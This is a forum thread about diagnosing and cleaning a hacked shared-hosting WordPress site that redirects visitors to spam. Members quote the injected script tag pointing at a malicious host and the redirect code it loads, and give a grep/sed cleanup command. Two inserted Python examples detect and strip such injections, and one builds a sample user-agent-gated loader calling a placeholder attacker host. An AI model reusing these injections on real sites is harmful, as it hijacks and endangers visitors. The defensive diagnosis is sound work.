Website redirect-spamsite

Henning

A member just informed me that when he went to my site he was auto redirected to a spam site. I tried to reproduce it on the computers here at the house but cannot.

If anybody has a moment to click on www.caphenning.com and let me know if they get a redirect to a spam site, I'd appreciate as much info as you can give me.

Thanks.
 
It might be that someone's DNS settings were hijacked. Might not be you.
 
Great, how the hell do I find it and get rid of it?

Welcome to the joys of free shared hosting; this is squarely their fault, but now your problem. Looks like some kid ran a script that exploits the server. Some sysadmin has been asleep (what were you payin' him :wink2:?) because the exploit looks fairly dated. The clean up is fairly straightforward, but you won't have enough access to do it given your setup... What I would do is figure out how to back up your wp database and files and MOVE! I looked at your site, it's unaffected, but who knows what apache is doing given they most likely modified httpd.conf.

Email on its way.
 
Thanks, it looks like AFMU got hit, they seem to be the target of a lot of malice.
 
They've jacked with your site -- they're loading a malicious javascript file.

The very last line of your source on:
http://caphenning.com/
contains:
Code:
<script src="http://waytur41noverse.rr.nu/pmg.php?d=x"></script>
You need to get this cleaned up. Complain to your host and go through your code looking for crap like that.

That code then loads
window.top.location.replace("http://sweepstakesandcontestsdo.com/n.php?h=1&s=pmg");

Which redirects to spam.
 
Hmmm, seems to only be picking on IE; that javascript doesn't seem to show up in Chrome at least. IE very much so.... What I'd be interested in is how they're doing it.
 
They're probably jacking with the PHP that is rendering your site. I'm sure they just slipped some EvilCode(tm) into the Wordpress code.
 
Hmmm, seems to only be picking on IE; that javascript doesn't seem to show up in Chrome at least. IE very much so.... What I'd be interested in is how they're doing it.

Does show up on Firefox 11.0. Haven't had time to update to FF 12.0.

On the other hand, FF blasts a warning to me about malicious site, so it's easy to "Get me Out of HERE!"
 
Firefox says nothing at all to me about it, perhaps AVG or one of the other filters I use is blocking it?
 
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways.. who set up this WordPress for you? Have you been applying security updates to it?
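A defender-side check for the cloaked injection described above, added here as an example (not code from the thread or from the site's owner): it lists the script tags in a served page whose src points at a host other than the site's own, and compares what different user agents receive, so a tag that only shows up for one browser stands out. The two sample responses and the attacker.invalid host are constructed; caphenning.com is the site from the thread.

```python
"""Added example (not from the thread): flag <script src=...> tags that point
off-site in served HTML, per user agent, to spot cloaked injections."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

SITE_HOST = "caphenning.com"  # the site discussed in the thread


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def foreign_scripts(html, site_host=SITE_HOST):
    """Return script src URLs whose host is neither the site nor a subdomain of it.
    Relative URLs (no host) are the site's own and are skipped."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    found = []
    for src in parser.srcs:
        host = urlsplit(src).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            found.append(src)
    return found


def compare_by_user_agent(responses, site_host=SITE_HOST):
    """responses: {user_agent_label: html}. Returns {label: [foreign srcs]} so a
    payload served only to one browser (the thread saw it only in IE) stands out."""
    return {ua: foreign_scripts(html, site_host) for ua, html in responses.items()}


# Constructed responses mimicking the thread: the IE variant carries a trailing
# <script> to an outside host, the Chrome variant is the clean page.
CLEAN_PAGE = ('<html><body><img src="/boat.jpg">'
              '<script src="/wp-includes/js/jquery.js"></script></body></html>')
INJECTED_PAGE = CLEAN_PAGE + '<script src="http://attacker.invalid/pmg.php?d=x"></script>'
SAMPLE_RESPONSES = {"MSIE": INJECTED_PAGE, "Chrome": CLEAN_PAGE}

if __name__ == "__main__":
    for ua, srcs in compare_by_user_agent(SAMPLE_RESPONSES).items():
        print(ua, "->", srcs or "no foreign scripts")
```

In practice you would fetch the page once per user agent string (a desktop IE string, a Chrome string, a crawler string) and feed each body to compare_by_user_agent; a site that is clean in your own browser but not in another is the pattern the thread ran into.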
 
I'm in there; some base64_decode() goodness added to all his .php files --- cleaning up.
 
Just tried it from my iPad... I see a quick glimpse of a large boat at a dock, then I land at bing.com/11f
 
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways.. who set up this WordPress for you? Have you been applying security updates to it?

That would be me, he's on a free hosting provider that installs wp via cPanel, I left the keys with him after the install.
 
Or they might not be spitting it out on certain user agents. View your source. Look at the very bottom. Do you see what I posted above?

There is something in the PHP which dynamically builds the HTML your browser receives that is doing this.

Anyways.. who set up this WordPress for you? Have you been applying security updates to it?

I did with some help here. I apply all security updates as they come. In fact, it appears that this one came the last time I updated about a week ago.
 
Appears to be something more nefarious than a WordPress issue; every php file in his account has been stamped with malicious code....
 
Appears to be something more nefarious than a WordPress issue; every php file in his directory has been stamped with malicious code....

I did a quick google on it and it appears they hit the entire host. After what happened in December, taking them down completely for 2 weeks, I'm doubting this is a kid's prank.
 
Appears to be something more nefarious than a WordPress issue; every php file in his account has been stamped with malicious code....

Sounds like the permissions were too liberal on files where they didn't need to be. Most likely they were 777 and another user blasted them with some code running under a shared apache user. Better permission settings would have stopped that.
 
Just blow the Wordpress install away and reinstall on a better host and migrate the db.
 
Sounds like the permissions were too liberal on files where they didn't need to be. Most likely they were 777 and another user blasted them with some code running under a shared apache user. Better permission settings would have stopped that.

They weren't 777; if FileZilla is reporting them correctly I'm seeing 755 as the most liberal permission on anything. No shell access, and the WordPress install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a WordPress breach; whatever did it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files, ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g'

on them and ftped them all back on the server and it appears to have fixed it.
No .htaccess nastiness that I could find.... I'd want to know how they did it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.
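The same cleanup as a small script, added here as an example rather than code from the thread: it looks for the `<?php /**/ eval(base64_decode("..."));?>` prologue that the sed expression above removes, decodes the payload so you can see what it does before deleting it (the thread reports the redirect only fired for Internet Explorer, which a payload that checks HTTP_USER_AGENT explains), and strips it after writing a .bak copy, the way sed -i.bak does. The directory, file contents and payload are constructed for the demo; attacker.invalid is a placeholder host.

```python
"""Added example (not from the thread): scan a tree for PHP files stamped with
an injected eval(base64_decode(...)) prologue, decode the payload for triage,
and strip it while keeping a .bak copy.  Everything written to disk here is
constructed for the demo."""
import base64
import os
import re
import tempfile

# The prologue the thread's sed expression removed:
#   <?php /**/ eval(base64_decode("...."));?>
PROLOGUE_RE = re.compile(
    rb'<\?php\s*/\*\*/\s*eval\(base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;\s*\?>'
)

# Substrings a defender wants flagged when they show up in a decoded payload.
TRIAGE_MARKERS = ("HTTP_USER_AGENT", "MSIE", "<script", "eval(",
                  "base64_decode", "file_get_contents", "curl_")


def find_prologue(data):
    """Return (match, decoded payload as str) or (None, None) for clean input."""
    m = PROLOGUE_RE.search(data)
    if not m:
        return None, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # not valid base64: still an injection, just undecodable
        decoded = ""
    return m, decoded


def triage(decoded):
    """Which of the watch-list strings the decoded payload contains."""
    return [mk for mk in TRIAGE_MARKERS if mk in decoded]


def clean_file(path):
    """Strip the prologue from one file, keeping path.bak. None if the file is clean."""
    with open(path, "rb") as f:
        data = f.read()
    m, decoded = find_prologue(data)
    if m is None:
        return None
    with open(path + ".bak", "wb") as f:
        f.write(data)
    with open(path, "wb") as f:
        f.write(data[:m.start()] + data[m.end():])
    return {"path": path, "markers": triage(decoded), "payload_len": len(decoded)}


def clean_tree(root):
    """Walk root, clean every *.php file, return the list of findings."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.endswith(".php"):
                result = clean_file(os.path.join(dirpath, name))
                if result:
                    findings.append(result)
    return findings


def demo():
    """Build a constructed WordPress-like tree: two stamped files, one clean."""
    # Constructed payload of the shape the thread describes: an off-site script
    # tag emitted only for Internet Explorer.  attacker.invalid is a placeholder.
    payload = ('if(strpos($_SERVER["HTTP_USER_AGENT"],"MSIE")!==false){'
               'echo "<script src=\\"http://attacker.invalid/x.js\\"></script>";}')
    stamp = (b'<?php /**/ eval(base64_decode("'
             + base64.b64encode(payload.encode()) + b'"));?>')
    root = tempfile.mkdtemp(prefix="wp-demo-")
    os.makedirs(os.path.join(root, "wp-content"))
    files = {
        "index.php": stamp + b"<?php\nrequire 'wp-blog-header.php';\n",
        "wp-content/plugin.php": stamp + b"<?php\n// a plugin\n",
        "wp-config.php": b"<?php\ndefine('DB_NAME', 'wp');\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(body)
    findings = clean_tree(root)
    # Re-scan: nothing should match after cleaning.
    leftovers = []
    for rel in files:
        with open(os.path.join(root, rel), "rb") as f:
            if find_prologue(f.read())[0] is not None:
                leftovers.append(rel)
    return findings, leftovers


if __name__ == "__main__":
    findings, leftovers = demo()
    for f in findings:
        print(f["path"], "payload", f["payload_len"], "bytes, markers:", f["markers"])
    print("files still stamped after cleaning:", leftovers or "none")
```

Run clean_tree on a downloaded copy of the account, as the thread's poster did, before uploading anything back; the markers list tells you whether the payload was the user-agent-gated script loader described above or something else worth keeping a copy of, and the .bak files are that copy.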
 
I see complaints from other AFMU users using other than WP, apparently this is the hack that brought the whole system down in December and they were down a long time redoing things. That this appeared last week is more than disconcerting.
 
They weren't 777; if FileZilla is reporting them correctly I'm seeing 755 as the most liberal permission on anything. No shell access, and the WordPress install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a WordPress breach; whatever did it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files, ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g'

on them and ftped them all back on the server and it appears to have fixed it.
No .htaccess nastiness that I could find.... I'd want to know how they did it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.

Yeah, that's what I would have done, too. ;)
 
I see complaints from other AFMU users using other than WP, apparently this is the hack that brought the whole system down in December and they were down a long time redoing things. That this appeared last week is more than disconcerting.

I was just going by timestamps. Websense already has you blocked; you'll probably need to beg them to unblock you now. I dunno how they operate; I recently bought a domain that had expired but was previously blocked by Websense, and emails seem to go to a black hole. That root.htm file was dated December, so it could have been another hack or this one just went undetected for a while; it was only issuing the "badness" to Internet Explorer from what I could tell, which might have prevented crawlers from figuring it out. Doesn't seem that Google has you flagged.... that's good.
 
Yeah, that's what I would have done, too. ;)

That's actually an easy one, the hacker could have been a little more creative, and made it hell to fix 900 and something files, at least harder than one (well technically 3) commands.

I haven't used sed in a while, stuff like this is good for keeping you on your toes.
 
Works fine from the iPad. I'll try later with IE8 from the PC.
 
They weren't 777; if FileZilla is reporting them correctly I'm seeing 755 as the most liberal permission on anything. No shell access, and the WordPress install was done from one of those "Application Vault" things in a cPanel so the provider should have dialed those in correctly. Not entirely sure it was a WordPress breach; whatever did it stamped every file with a .php extension with some nasty base64_encoded() stuff. Luckily, it was regex-able. I downloaded all his *.php files, ran

grep -lr --include=*.php "eval(base64_decode" . | xargs sed -i.bak 's/<?php \/\*\*\/ eval(base64_decode[^;]*;?>/\n/g'

on them and ftped them all back on the server and it appears to have fixed it.
No .htaccess nastiness that I could find.... I'd want to know how they did it though. I didn't see anything in the logs and I'm not ready to blame WP just yet.

Well then, most likely the entire server was compromised at the root level.
 
It was, it was knocked out in Dec.
 
Any chance this latest mayhem is the result of an "innocent" file restore from a backup created after the hack occurred and before it was exorcized?
 
Any chance this latest mayhem is the result of an "innocent" file restore from a backup created after the hack occurred and before it was exorcized?

LOL, you are asking the wrong M-F-r on that one. By the time all this crap entered the computer world I was over my curiosity on how it works, I just use the crap, when it goes wrong I ask for help.
 
LOL, you are asking the wrong M-F-r on that one. By the time all this crap entered the computer world I was over my curiosity on how it works, I just use the crap, when it goes wrong I ask for help.

Did you update your DNS (Nameservers) yet?
 